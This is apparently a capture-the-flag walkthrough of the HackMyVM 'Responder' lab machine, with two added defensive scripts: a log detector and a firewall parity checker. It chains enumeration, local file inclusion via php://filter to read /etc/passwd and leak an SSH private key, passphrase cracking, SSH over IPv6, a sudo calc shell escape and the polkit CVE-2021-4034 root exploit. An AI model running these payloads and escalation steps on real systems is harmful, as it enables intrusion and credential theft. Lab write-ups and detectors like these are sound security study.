HackMyVm Responder Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Responder

Scan the ports; note that port 22 is filtered.

nmap -sV -sC -oN port.log 192.168.56.100
Nmap scan report for darkmatter.hmv (192.168.56.100)
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)

Check port 80: there is only a simple page that shows the current time.

~/D/responder $curl 192.168.56.100                                              
your answer is in the answer.. it's
01:46
and your time is running out..

Scan port 80 and find filemanager.php. The number of scan threads cannot be too high; I set it to 20.

~/D/responder $gobuster dir -u 192.168.56.100/ -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
/index.php            (Status: 200) [Size: 73]
/filemanager.php      (Status: 302) [Size: 0] [--> /]

Fuzz the parameter name of filemanager.php and get "random".

~/D/responder $wfuzz -u "192.168.56.100/filemanager.php?FUZZ=/etc/passwd"  -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 0
=====================================================================
ID           Response   Lines    Word       Chars       Payload                 
=====================================================================
000003395:   302        27 L     39 W       1430 Ch     "random"

The LFI works. Check /etc/passwd and get two user names.

~/D/responder $curl "192.168.56.100/filemanager.php?random=/etc/passwd"         
root:x:0:0:root:/root:/bin/bash
...
elliot:x:1001:1001::/home/elliot:/bin/bash
rohit:x:1002:1002::/home/rohit:/bin/bash

After enumerating some Linux files, we cannot get a shell through log files. So check the source code of filemanager.php, where we find an SSH key.

~/D/responder $curl "192.168.56.100/filemanager.php?random=php://filter/convert.base64-encode/resource=filemanager.php" |base64 -d
...          
<?php                                                                                    
    $filename = $_GET['random'];
    include($filename);
    header('Location:/');

/*

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED 
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4

XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
...
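
The requests used against filemanager.php above leave a clear trace in the web server's access log. The following is an added example, not part of the original walkthrough: a small detector that flags include-parameter abuse in Apache access-log lines. The log lines, the client address and the 2120-byte size are constructed, and the size field is assumed to be %b (body bytes).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache access-log prefix: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Values an include-style parameter should never carry.
SUSPICIOUS = [
    ("stream-wrapper", re.compile(r'^(php|data|expect|zip|phar|file)://', re.I)),
    ("absolute-path", re.compile(r'^/(etc|proc|var|home|root)/')),
    ("traversal", re.compile(r'(^|/)\.\.(/|$)')),
]

def classify(line):
    """Return finding tags for one access-log line (empty list = clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    # parse_qsl percent-decodes once, so %2e%2e%2f is matched as ../
    for _name, value in parse_qsl(urlsplit(m["target"]).query):
        findings += [tag for tag, pat in SUSPICIOUS if pat.search(value)]
    # Assumes the size field is %b (body bytes). filemanager.php normally
    # redirects with an empty body, so a 302 with a body means include() printed.
    size = 0 if m["size"] == "-" else int(m["size"])
    if m["status"] == "302" and size > 0:
        findings.append("redirect-with-body")
    return findings

# Constructed sample lines modelled on the requests in this walkthrough.
SAMPLE_LOG = [
    '192.168.56.1 - - [05/Feb/2022:08:40:01 +0800] "GET /index.php HTTP/1.1" 200 73',
    '192.168.56.1 - - [05/Feb/2022:08:41:10 +0800] "GET /filemanager.php HTTP/1.1" 302 -',
    '192.168.56.1 - - [05/Feb/2022:08:42:33 +0800] "GET /filemanager.php?random=/etc/passwd HTTP/1.1" 302 1430',
    '192.168.56.1 - - [05/Feb/2022:08:44:02 +0800] "GET /filemanager.php?random=php://filter/convert.base64-encode/resource=filemanager.php HTTP/1.1" 302 2120',
]

def scan(lines):
    """Return (line_number, tags) for every line with at least one finding."""
    hits = [(n, classify(l)) for n, l in enumerate(lines, 1)]
    return [(n, tags) for n, tags in hits if tags]

if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG):
        print(n, ",".join(tags))
```

If the log format records %O (bytes including headers) instead of %b, the redirect-with-body check has to be dropped, because every response then has a non-zero size.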

Crack the passphrase of the SSH key with john.

~/D/responder $/usr/share/john/ssh2john.py id_rsa > hash.txt                     
~/D/responder $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt         
...
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx          (id_rsa)

Now we have the user name, SSH key and passphrase needed to connect to port 22, but port 22 is filtered. Maybe it can be reached over IPv6.

Check the IPv6 address of the machine.

~/D/responder $ping6 -c2 -n -I eth1 ff02::1                                    
ping6: Warning: source address might be selected on device other than: eth1
PING ff02::1(ff02::1) from :: eth1: 56 data bytes
...
64 bytes from fe80::a00:27ff:fec2:1426%eth1: icmp_seq=1 ttl=64 time=4.76 ms
...

Check port 22 over IPv6: yes, it's open.

~/D/responder $nmap -6 -p22 fe80::a00:27ff:fec2:1426%eth1    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 08:59 CST
Nmap scan report for fe80::a00:27ff:fec2:1426
Host is up (0.0097s latency).

PORT   STATE SERVICE
22/tcp open  ssh
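
A port that is filtered over IPv4 but open over IPv6 is what a host shows when, for example, a block rule exists for only one address family. The following is an added example, not part of the original walkthrough: a parity check over iptables-save and ip6tables-save output. Both rule sets are constructed, and it assumes the host filters with iptables, uses an ACCEPT default policy and has simple single-port block rules.

```python
def blocked_ports(ruleset):
    """TCP ports that an INPUT chain drops or rejects for every source.

    Handles only simple rules from iptables-save/ip6tables-save output:
    single --dport, no negation, default policy assumed to be ACCEPT.
    """
    ports = set()
    for line in ruleset.splitlines():
        tokens = line.split()
        if tokens[:2] != ["-A", "INPUT"] or "!" in tokens:
            continue
        # In these simple rules every option takes exactly one argument.
        opts = dict(zip(tokens[2::2], tokens[3::2]))
        if opts.get("-p") != "tcp" or opts.get("-j") not in ("DROP", "REJECT"):
            continue
        if "-s" in opts or "-i" in opts:   # scoped rule, not a blanket block
            continue
        if opts.get("--dport", "").isdigit():
            ports.add(int(opts["--dport"]))
    return ports

def parity_gaps(v4_rules, v6_rules):
    """Ports blocked over IPv4 that have no matching block over IPv6."""
    return sorted(blocked_ports(v4_rules) - blocked_ports(v6_rules))

# Constructed rule sets: the IPv4 side blocks SSH, the IPv6 side has no rules.
V4_SAMPLE = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -s 10.0.0.0/8 -p tcp -m tcp --dport 80 -j DROP
-A INPUT -p tcp -m tcp --dport 22 -j DROP
COMMIT
"""
V6_SAMPLE = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT
"""

if __name__ == "__main__":
    for port in parity_gaps(V4_SAMPLE, V6_SAMPLE):
        print(f"tcp/{port} is blocked over IPv4 but not over IPv6")
```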

Log in over SSH as user elliot.

~/D/responder $ssh elliot@fe80::a00:27ff:fec2:1426%eth1 -i id_rsa -6    
Enter passphrase for key 'id_rsa': 
Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
elliot@responder:~$ id
uid=1001(elliot) gid=1001(elliot) groups=1001(elliot)

Check sudo -l.

elliot@responder:~$ sudo -l
sudo: unable to resolve host responder: Temporary failure in name resolution
Matching Defaults entries for elliot on responder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on responder:
    (rohit) NOPASSWD: /usr/bin/calc

Run calc, enter the help page, and input "!/bin/bash" after the ":" prompt.

elliot@responder:~$ sudo -u rohit /usr/bin/calc
sudo: unable to resolve host responder: Temporary failure in name resolution
C-style arbitrary precision calculator (version 2.12.7.2)
Calc is open software. For license details type:  help copyright
[Type "exit" to exit, or "help" for help.]

; help
...
For more information while running calc, type  help  followed by one of the
following topics:

    topic               description
    -----               -----------
    intro               introduction to calc
    overview            overview of calc
    help                this file
...
!/bin/bash
...
rohit@responder:/home/elliot$ id
uid=1002(rohit) gid=1002(rohit) groups=1002(rohit)

Check the SUID files; note the polkit binaries.

elliot@responder:~$ find / -perm -u=s 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/umount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

Use the latest polkit CVE (CVE-2021-4034) to get root.

elliot@responder:/tmp$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
elliot@responder:/tmp$ ./cve-2021-4034-poc 
# id
uid=0(root) gid=0(root) groups=0(root),1001(elliot)
